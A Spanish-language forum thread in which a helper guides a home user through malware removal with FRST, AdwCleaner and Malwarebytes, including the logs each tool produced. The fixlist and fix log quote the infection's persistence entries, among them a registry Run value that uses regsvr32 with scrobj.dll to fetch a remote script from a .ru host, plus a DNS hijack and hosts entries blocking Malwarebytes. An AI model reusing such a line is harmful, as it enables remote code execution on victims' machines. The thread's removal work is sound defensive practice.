FirewallRules: [TCP Query User{04C22F37-9603-465F-815E-37F38486F1DA}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.160\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.160\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{B89B45E2-2A53-4ED7-B129-917471B6306E}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.160\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.160\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{B1524B90-B864-4AFD-B78E-E5F599B537E8}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.161\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.161\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{E13FD752-7E41-4C11-9987-4358AE0CEC63}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.161\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.161\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{8F976A90-C687-4FD6-9141-889CAD57FB2D}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.162\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.162\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{03F47DD5-648D-4556-909F-25D7EE7A7C37}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.162\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.162\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{E53A12F1-9811-40B3-9BA4-93F39D80DB23}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.163\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.163\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{3C8F5781-51E6-489A-9E90-2D88477F13BD}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.163\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.163\deploy\leagueclient.exe Ningún archivo
FirewallRules: [{EAE3E187-9D04-49F4-A4B0-853596BFBFA5}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{AFEA90B5-FA67-43D1-8509-81A6255DD64C}] => (Allow) C:\Program Files\BlueStacks\HD-Player.exe Ningún archivo
FirewallRules: [{2C916BF5-DB28-4C44-8AFD-D827448F82BB}] => (Allow) C:\Program Files\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{7DE87355-A05F-410A-8AAE-AD72211BAAE8}] => (Allow) C:\Program Files\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{1F09387B-EAC1-494C-9728-5D3C7724F953}] => (Allow) C:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{DC393E86-4829-46F1-B277-E2E6F1B3B57D}] => (Allow) C:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)

==================== Puntos de Restauración =========================

20-04-2020 14:28:31 Punto de control programado
21-04-2020 10:15:13 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24212
21-04-2020 10:16:09 Installed Intel® Processor Identification Utility

==================== Dispositivos defectuosos en el Administrador de dispositivos ============

Name: Security Processor Loader Driver
Description: Security Processor Loader Driver
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer: 
Service: spldr
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.


==================== Errores del registro de eventos: ========================

Errores de aplicación:
==================
Error: (04/22/2020 11:47:48 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (04/22/2020 11:42:57 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (04/22/2020 11:41:13 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Error de activación de la licencia de Windows. Error 0x00000000.

Error: (04/22/2020 11:41:12 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Error de la activación de licencia (slui.exe) con el siguiente código:
0x800401F9

Error: (04/22/2020 11:40:06 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (04/22/2020 11:38:25 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Error de activación de la licencia de Windows. Error 0x00000000.

Error: (04/22/2020 11:38:25 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Error de la activación de licencia (slui.exe) con el siguiente código:
0x800401F9

Error: (04/22/2020 11:26:57 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.


Errores del sistema:
=============
Error: (04/22/2020 11:47:46 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: Error de DCOM "1084" al intentar iniciar el servicio VSS con argumentos "" para ejecutar el servidor:
{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}

Error: (04/22/2020 11:46:19 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error: 
No se puede iniciar el servicio o grupo de dependencia.

Error: (04/22/2020 11:46:19 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error: 
No se puede iniciar el servicio o grupo de dependencia.

Error: (04/22/2020 11:46:19 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error: 
No se puede iniciar el servicio o grupo de dependencia.

Error: (04/22/2020 11:46:19 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error: 
No se puede iniciar el servicio o grupo de dependencia.

Error: (04/22/2020 11:46:19 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error: 
No se puede iniciar el servicio o grupo de dependencia.

Error: (04/22/2020 11:46:19 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error: 
No se puede iniciar el servicio o grupo de dependencia.

Error: (04/22/2020 11:46:19 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: Error de DCOM "1084" al intentar iniciar el servicio WSearch con argumentos "" para ejecutar el servidor:
{9E175B6D-F52A-11D8-B9A5-505054503030}


Windows Defender:
===================================
Date: 2020-04-16 10:04:25.437
Description: 
El examen de Windows Defender se detuvo antes de completarse.
Id. de examen:{D89403F0-B93D-475E-9BE2-D2E52245BCDF}
Tipo de examen:AntiSpyware
Parámetros de examen:Examen rápido
Usuario:FamiliaLandaeta\Familia Landaeta

==================== Información de la memoria =========================== 

BIOS: American Megatrends Inc. 6.07 03/21/2011
Placa base: FOXCONN 2A8C
Procesador: Pentium(R) Dual-Core CPU E5800 @ 3.20GHz
Porcentaje de memoria en uso: 72%
RAM física total: 2013.24 MB
RAM física disponible: 554.35 MB
Virtual total: 4026.48 MB
Virtual disponible: 2630.89 MB

==================== Unidades ================================

Drive c: () (Fixed) (Total:148.95 GB) (Free:44.16 GB) NTFS

\\?\Volume{459fd2d9-792a-11e6-a962-806e6f6e6963}\ (Reservado para el sistema) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS

==================== MBR & Tabla de particiones ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 149.1 GB) (Disk ID: F362F362)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=149 GB) - (Type=07 NTFS)

==================== Final  Addition.txt =======================

Lo primero dale a desinstalar Ccleaner

Bien… y ahora sigue estos pasos, MUY Importante ~ Realiza una copia de seguridad del registro :

  • Para hacerlo descarga Delfix en tu escritorio.

  • Doble clic para ejecutarlo.(Si usas Windows Vista/7/8 o 10 presiona clic derecho y selecciona "Ejecutar como Administrador.")

  • Atención, ahora marca/selecciona únicamente las casillas Registry Backup, las demás NO

  • Pulsar en Run.

Se abrirá el informe (Delfix.txt), guárdalo por si fuera necesario y cierra la herramienta.


En el equipo con los demas programas cerrados:

Inicio >>> Ejecutar >>>Escribes notepad.exe.

Ahora copia y pega estos archivos dentro del Notepad:


Start
CreateRestorePoint:
CloseProcesses:

ShortcutAndArgument: user.lnk -> C:\Windows\System32\cmd.exe => /c explorer hxxp://www2.savemax.store/
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\MountPoints2: {3ce42c48-38d5-11e8-849d-78acc0bd591b} - E:\Setup.exe
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.39slxu3bw.ru/restore.xml scrobj.dll <==== ATENCIÓN
Startup: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xiwlwq.lnk [2020-04-22]
ShortcutTarget: xiwlwq.lnk -> C:\Users\Familia Landaeta\AppData\Local\aoxfre\obbtgsrn.exe (Microsoft Windows -> Microsoft Corporation)
Task: {AB5506EA-16C8-46C4-9F8E-4B7ED9BA87EA} - System32\Tasks\{568A21DE-A13A-462D-94F2-3A85694880BF} => C:\Windows\system32\pcalua.exe -a C:\Users\FAMILI~1\AppData\Local\Temp\jre-8u161-windows-au.exe -d C:\Windows\system32 -c /installmethod=jau FAMILYUPGRADE=1 <==== ATENCIÓN
Task: C:\Windows\Tasks\CCleaner Update.job => C:\Program Files\CCleaner\CCUpdate.exe
C:\Program Files\CCleaner
Toolbar: HKU\S-1-5-21-1692793609-910991690-2205039242-1000 -> Sin Nombre - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  Ningún archivo
S3 fiddrv; no ImagePath
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
S3 XDva511; \??\C:\Windows\system32\XDva511.sys [X]
2016-12-15 03:13 - 2016-12-15 03:14 - 000000000 _____ () C:\Users\Familia Landaeta\AppData\Local\{42A7229B-167F-4CEB-928F-88DF4E1A435E}
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
ShortcutWithArgument: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> /c explorer hxxp://www2.savemax.store/


HOSTS:
REMOVEPROXY:
EMPTYTEMP:
CMD: netsh winsock reset
CMD: ipconfig /renew
CMD: ipconfig /flushdns
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
END

Lo guardas bajo el nombre de fixlist.txt en el escritorio <<< Esto es muy importante.<<

Nota: Es importante que la Hta Frst.exe y fixlist.txt se encuentren en la misma ubicación (escritorio) o si no no trabajara.

  • Y ahora INICIA EN MODO SEGURO DE WINDOWS

  • Ejecutas Frst.exe.

  • Presionas el botón Corregir y aguardas a que termine.

  • La Herramienta guardara el reporte en tu escritorio (Fixlog.txt).

Lo pegas en tu próxima respuesta, y ademas realizas

1) Descarga, instala y ejecuta Malwarebytes’ Anti-Malware.

  • Presiona clic en “Use Malewarebytes Free” (Usar Malewarebyte gratis).

  • Pulsa en el botón “Open Malewarebytes Free”.

imagen

  • Presiona el botón “Scan” (Escaneo).

imagen

Una vez finalizado el escaneo aparecerá la siguiente pantalla:

imagen

  • Pulsa en “View report” (Ver informe).

  • Luego presionar el botón “Export” (Exportar). Elijes “Text file” (fichero de texto). Elijes un nombre y guardas ese archivo en el escritorio…

2) Descarga Adwcleaner en el escritorio.

  • Desactiva tu antivirus :arrow_forward:Como deshabilitar temporalmente un antivirus y cualquier programa de seguridad.

  • Ejecuta Adwcleaner.exe (Si usas Windows Vista/7 u 8 presiona clic derecho y selecciona "Ejecutar como Administrador.")

  • Pulsar en el botón Analizar Ahora, y espera a que se realice el proceso, inmediatamente pulsa sobre el botón Iniciar Reparacion.

  • Espera a que se complete y sigue las instrucciones, si te pidiera Reiniciar el sistema Aceptas.

  • Si no encuentra nada, pulsamos “Omitir Reparación

  • El log lo encontramos en la pestaña “Informes”, volviendo a abrir el programa, si es necesario o en"C:\AdwCleaner\Logs\AdwCleaner[C0].txt"

Puedes mirar su manual >> Manual de Adwcleaner.

  Resultados de la corrección de Farbar Recovery Scan Tool (x86) Versión: 19-04-2020
Ejecutado por Familia Landaeta (25-04-2020 08:16:14) Run:1
Ejecutado desde C:\Users\Familia Landaeta\Desktop
Perfiles cargados: Familia Landaeta (Perfiles disponibles: Familia Landaeta)
Modo de Inicio: Safe Mode (minimal)

==============================================

fixlist contenido:
*****************

Start
CreateRestorePoint:
CloseProcesses:

ShortcutAndArgument: user.lnk -> C:\Windows\System32\cmd.exe => /c explorer hxxp://www2.savemax.store/
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\MountPoints2: {3ce42c48-38d5-11e8-849d-78acc0bd591b} - E:\Setup.exe
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.39slxu3bw.ru/restore.xml scrobj.dll <==== ATENCI�N
Startup: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xiwlwq.lnk [2020-04-22]
ShortcutTarget: xiwlwq.lnk -> C:\Users\Familia Landaeta\AppData\Local\aoxfre\obbtgsrn.exe (Microsoft Windows -> Microsoft Corporation)
Task: {AB5506EA-16C8-46C4-9F8E-4B7ED9BA87EA} - System32\Tasks\{568A21DE-A13A-462D-94F2-3A85694880BF} => C:\Windows\system32\pcalua.exe -a C:\Users\FAMILI~1\AppData\Local\Temp\jre-8u161-windows-au.exe -d C:\Windows\system32 -c /installmethod=jau FAMILYUPGRADE=1 <==== ATENCI�N
Task: C:\Windows\Tasks\CCleaner Update.job => C:\Program Files\CCleaner\CCUpdate.exe
C:\Program Files\CCleaner
Toolbar: HKU\S-1-5-21-1692793609-910991690-2205039242-1000 -> Sin Nombre - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  Ning�n archivo
S3 fiddrv; no ImagePath
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
S3 XDva511; \??\C:\Windows\system32\XDva511.sys [X]
2016-12-15 03:13 - 2016-12-15 03:14 - 000000000 _____ () C:\Users\Familia Landaeta\AppData\Local\{42A7229B-167F-4CEB-928F-88DF4E1A435E}
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
ShortcutWithArgument: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> /c explorer hxxp://www2.savemax.store/


HOSTS:
REMOVEPROXY:
EMPTYTEMP:
CMD: netsh winsock reset
CMD: ipconfig /renew
CMD: ipconfig /flushdns
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
END
*****************

Error: El punto de restauración solamente puede ser creado en modo normal.
Procesos cerrados correctamente.
ShortcutAndArgument: user.lnk -> C:\Windows\System32\cmd.exe => /c explorer hxxp://www2.savemax.store/ => Error: Ninguna corrección automática encontrada para esta entrada.
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{3ce42c48-38d5-11e8-849d-78acc0bd591b} => eliminado correctamente
"HKU\S-1-5-21-1692793609-910991690-2205039242-1000\Software\Microsoft\Windows\CurrentVersion\Run\\COM+" => eliminado correctamente
C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xiwlwq.lnk => movido correctamente
"C:\Users\Familia Landaeta\AppData\Local\aoxfre\obbtgsrn.exe" => no encontrado
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AB5506EA-16C8-46C4-9F8E-4B7ED9BA87EA}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AB5506EA-16C8-46C4-9F8E-4B7ED9BA87EA}" => eliminado correctamente
C:\Windows\System32\Tasks\{568A21DE-A13A-462D-94F2-3A85694880BF} => movido correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{568A21DE-A13A-462D-94F2-3A85694880BF}" => eliminado correctamente
C:\Windows\Tasks\CCleaner Update.job => movido correctamente
"C:\Program Files\CCleaner" => no encontrado
"HKU\S-1-5-21-1692793609-910991690-2205039242-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{2318C2B1-4965-11D4-9B18-009027A5CD4F}" => eliminado correctamente
HKLM\System\CurrentControlSet\Services\fiddrv => eliminado correctamente
fiddrv => servicio eliminado correctamente
HKLM\System\CurrentControlSet\Services\VGPU => eliminado correctamente
VGPU => servicio eliminado correctamente
HKLM\System\CurrentControlSet\Services\XDva511 => eliminado correctamente
XDva511 => servicio eliminado correctamente
C:\Users\Familia Landaeta\AppData\Local\{42A7229B-167F-4CEB-928F-88DF4E1A435E} => movido correctamente
"CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"" => eliminado correctamente
"BVTFilter" => eliminado correctamente
"BVTConsumer" => eliminado correctamente
C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.lnk => Acceso directo argumento eliminado correctamente
C:\Windows\System32\Drivers\etc\hosts => movido correctamente
Hosts restaurado correctamente.

========= RemoveProxy: =========

"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => eliminado correctamente
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => eliminado correctamente
"HKU\S-1-5-21-1692793609-910991690-2205039242-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => eliminado correctamente
"HKU\S-1-5-21-1692793609-910991690-2205039242-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => eliminado correctamente


========= Final de RemoveProxy: =========


========= netsh winsock reset =========


El cat logo Winsock se restableci¢ correctamente.
Debe reiniciar el equipo para completar el restablecimiento.


========= Final de CMD: =========


========= ipconfig /renew =========


Configuraci¢n IP de Windows


========= Final de CMD: =========


========= ipconfig /flushdns =========


Configuraci¢n IP de Windows

No se puede vaciar la cach‚ de resoluci¢n de DNS: Error de una funci¢n durante la ejecuci¢n.


========= Final de CMD: =========


========= bitsadmin /reset /allusers =========


BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Unable to connect to BITS - 0x8007042c
No se puede iniciar el servicio o grupo de dependencia.



========= Final de CMD: =========


========= netsh advfirewall reset =========


Error al intentar ponerse en contacto con el servicio Firewall de Windows. Aseg£rese de que el servicio se est  ejecutando e intente la solicitud de nuevo.


========= Final de CMD: =========


========= netsh advfirewall set allprofiles state ON =========


Error al intentar ponerse en contacto con el servicio Firewall de Windows. Aseg£rese de que el servicio se est  ejecutando e intente la solicitud de nuevo.


========= Final de CMD: =========


========= netsh int ipv4 reset =========

No hay valores configurados por el usuario para restablecer.


========= Final de CMD: =========


========= netsh int ipv6 reset =========

No hay valores configurados por el usuario para restablecer.


========= Final de CMD: =========


=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 16438499 B
Java, Flash, Steam htmlcache => 11125976 B
Windows/system/drivers => 35290840 B
Edge => 0 B
Chrome => 461424075 B
Firefox => 5331236 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 66356 B
LocalService => 132584 B
NetworkService => 282430 B
Familia Landaeta => 960903152 B

RecycleBin => 6032034105 B
EmptyTemp: => 7 GB datos temporales Eliminados.

================================


El sistema necesita reiniciarse.

==== Final  Fixlog 08:17:26 ====

todo bien hazta el paso de instalar el malwarebytes y es que, comienza a instalarse, dura un par de minutos y se cierra el instalador

malwarebytes

Bien… y ahora descarga en tu escritorio :arrow_right: Windows Repair all in one, hazlo con la versión portable suele estar la última de todas donde veas que pone Captura ?

Es un fichero ZIP con este nombre :white_check_mark: tweaking.com_windows_repair_aio.zip, lo descomprimes y ejecutas desde la carpeta que se habrá generado en tu escritorio.

Haces doble clic sobre el archivo Repair_Windows.exe.(Si usas Windows Vista/7/8 o 10 presiona clic derecho y selecciona Ejecutar como Administrador.- )

Aceptas en la primera pantalla la licencia de uso pulsando en I Agree y a continuación veras la pantalla inicial del programa, donde debes seguir estos pasos :

:one: Repairs - Main.

:two: Open Repairs.



Inmediatamente aparecerá esta nueva ventana, donde debes seguir pulsando en :

:three: Start Repairs.


El proceso ira realizando todos los pasos establecidos y cuando termine ya Reinicias TU el equipo. :white_check_mark:

Trata de instalar de nuevo Malwarebytes

Saludos.

sigo teniendo problemas con el malwarebytes

vfgf

Ejecuta la herramienta de desinstalación de Malwarebytes ,reinicias en PC y vuelve a tratar de instalarlo

malwa

persiste el error. Me recomiendas ejecutar el Adwcleaner?

Ejecuta Adwcleaner y ademas este otro.

Me pones ambos logs

adwcleaner me arrojo dos logs.

# -------------------------------
# Malwarebytes AdwCleaner 8.0.4.0
# -------------------------------
# Build:    04-03-2020
# Database: 2020-04-08.2 (Cloud)
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start:    04-27-2020
# Duration: 00:00:01
# OS:       Windows 7 Ultimate
# Cleaned:  2
# Failed:   0


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

No malicious folders cleaned.

***** [ Files ] *****

No malicious files cleaned.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

Deleted       HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{6CBAB555-2BC9-4266-B7B7-0CBF840B2538}|DhcpNameServer - "37.120.145.234"
Deleted       HKLM\System\CurrentControlSet\Services\Tcpip\Parameters|DhcpNameServer - "37.120.145.234"

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.

***** [ Hosts File Entries ] *****

No malicious hosts file entries cleaned.

***** [ Preinstalled Software ] *****

No Preinstalled Software cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [1667 octets] - [27/04/2020 12:01:30]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########

# -------------------------------
# Malwarebytes AdwCleaner 8.0.4.0
# -------------------------------
# Build:    04-03-2020
# Database: 2020-04-08.2 (Cloud)
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Scan
# -------------------------------
# Start:    04-27-2020
# Duration: 00:00:37
# OS:       Windows 7 Ultimate
# Scanned:  31802
# Detected: 2


***** [ Services ] *****

No malicious services found.

***** [ Folders ] *****

No malicious folders found.

***** [ Files ] *****

No malicious files found.

***** [ DLL ] *****

No malicious DLLs found.

***** [ WMI ] *****

No malicious WMI found.

***** [ Shortcuts ] *****

No malicious shortcuts found.

***** [ Tasks ] *****

No malicious tasks found.

***** [ Registry ] *****

PUP.Optional.DNSChanger         HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{6CBAB555-2BC9-4266-B7B7-0CBF840B2538}|DhcpNameServer - "37.120.145.234"
PUP.Optional.DNSChanger         HKLM\System\CurrentControlSet\Services\Tcpip\Parameters|DhcpNameServer - "37.120.145.234"

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries found.

***** [ Chromium URLs ] *****

No malicious Chromium URLs found.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries found.

***** [ Firefox URLs ] *****

No malicious Firefox URLs found.

***** [ Hosts File Entries ] *****

No malicious hosts file entries found.

***** [ Preinstalled Software ] *****

No Preinstalled Software found.



########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S00].txt ##########

y aquì los de malwarebytes antirootkit

Malwarebytes Anti-Rootkit BETA 1.10.3.1001
www.malwarebytes.org

Database version:
  main:    v2020.04.27.04
  rootkit: v2020.04.27.04

Windows 7 Service Pack 1 x86 NTFS
Internet Explorer 11.0.9600.19129
Familia Landaeta :: FAMILIALANDAETA [administrator]

27/04/2020 11:03:47
mbar-log-2020-04-27 (11-03-47).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled: 
Objects scanned: 154687
Time elapsed: 24 minute(s), 57 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 3
C:\Windows\System32\drivers\etc\hosts (RiskWare.DontStealOurSoftware) -> Bad: (0.0.0.0 keystone-prod.elasticbeanstalk.com) Good: () -> Replace on reboot. [def2d8e41eb8989e44199bf0cf358c74]
C:\Windows\System32\drivers\etc\hosts (RiskWare.DontStealOurSoftware) -> Bad: (0.0.0.0 keystone.mwbsys.com) Good: () -> Replace on reboot. [c90705b7b12536002b33870407fd11ef]
C:\Windows\System32\drivers\etc\hosts (RiskWare.DontStealOurSoftware) -> Bad: (0.0.0.0 serius.mwbsys.com) Good: () -> Replace on reboot. [e4ec5864b026c96db9a6b8d3c93b25db]

Physical Sectors Detected: 0
(No malicious items detected)

(end)
---------------------------------------
Malwarebytes Anti-Rootkit BETA 1.10.3.1001

(c) Malwarebytes Corporation 2011-2012

OS version: 6.1.7601 Windows 7 Service Pack 1 x86

Account is Administrative

Internet Explorer version: 11.0.9600.19129

File system is: NTFS
Disk drives: C:\ DRIVE_FIXED
CPU speed: 3.200000 GHz
Memory total: 2111037440, free: 882274304

Downloaded database version: v2020.04.27.04
Downloaded database version: v2020.04.27.04
Downloaded database version: v2018.01.20.01
=======================================
Initializing...
Driver version: 4.3.0.15
------------ Kernel report ------------
     04/27/2020 11:03:22
------------ Loaded modules -----------
\SystemRoot\system32\ntkrnlpa.exe
\SystemRoot\system32\halmacpi.dll
\SystemRoot\system32\kdcom.dll
